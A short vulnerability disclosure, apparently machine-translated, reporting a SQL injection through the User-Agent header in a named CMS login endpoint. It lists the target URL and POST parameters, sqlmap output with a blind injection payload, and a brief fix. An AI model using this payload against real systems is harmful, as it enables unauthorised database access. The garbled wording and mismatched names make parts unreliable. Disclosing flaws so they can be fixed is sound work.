A cms system injection and solution of Huawei Voice online

A cms system injection and solution of Huawei Voice online

The CMS system has a system injection vulnerability. You can use this vulnerability to export data from the H3C forum.

Http://cms.voc.com.cn/voccgi/app/mobile/bbsapi/wxhn_login.php

This file calls the bbs.voc.com.cn Forum interface to pass User-Agent as a parameter, but the interface does not escape the User-Agent incoming data, resulting in malicious User injection.

MySQL error message returned after UA is modified
 

MySQL Injection
 

Database
 

Injection point:

Http://cms.voc.com.cn/voccgi/app/mobile/bbsapi/wxhn_login.php (POST)

Username = 13800000000 & type = 0 & password = 123456 & userid = 903803006541270965 & channelId = 4179589380995243418

Injection statement:
 

Place: User-AgentParameter: User-AgentType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: sqlmap/1.0-dev-35ed668 (http://sqlmap.org)'||(SELECT 'vfPO' FROM DUAL WHERE 5810=5810 AND 5919=5919)||'Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clauseroot@localhost:~/.sqlmap/output/cms.voc.com.cn# head -n 20 logsqlmap identified the following injection points with a total of 60595 HTTP(s) requests:

Solution:

Modify the wxhn_login.php interface code and add the SQL Injection filtering code to the User-Agent field. Modify the bbs.voc.com.cn/api/web/webapi.php file and add the injection to the filter file.